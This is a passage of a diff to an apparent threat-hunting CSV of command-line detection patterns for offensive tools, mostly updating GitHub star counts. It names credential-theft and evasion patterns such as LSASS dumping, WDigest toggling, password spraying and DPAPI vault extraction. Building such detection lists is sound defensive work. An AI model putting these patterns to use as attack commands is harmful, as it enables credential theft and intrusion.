injection and database 
takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -UrbanBishop -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -UrbanBishop -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* --url * --attacker *","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "* --url --password SIMPLEPASS*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "* -urlcache */debase64/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Use-DarkHotel*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"* -user * --passwordlist *","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" -"* userenum * --dc *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -Username * -Hash * -Command *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -user * --passwordlist *","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"* userenum * --dc *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -Username * -Hash * -Command *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Username * -Password * -Command * -LogonType *","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit 
credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* --UserName * --Password * --Payload *.exe*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" -"* -UserPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -UserPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --user-spns*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"* -VaultElementPtr *","offensive_tool_keyword","empire","Empire scripts 
functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* vaults /target:* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* -VaultElementPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* vaults /target:* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* ventrilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* versant-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -2061,15 +2061,15 @@ "* vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -vulnerable -stdout -hide-admins*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -vulnerable -stdout -hide-admins*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -w wordlist/*.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -watson -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -w wordlist/*.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -watson -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* wdb-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --wdigest disable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --wdigest enable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wdigest disable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --wdigest enable*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* web-hacking-toolkit *","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "* weblogic-t3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --werfault *\temp\*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" 
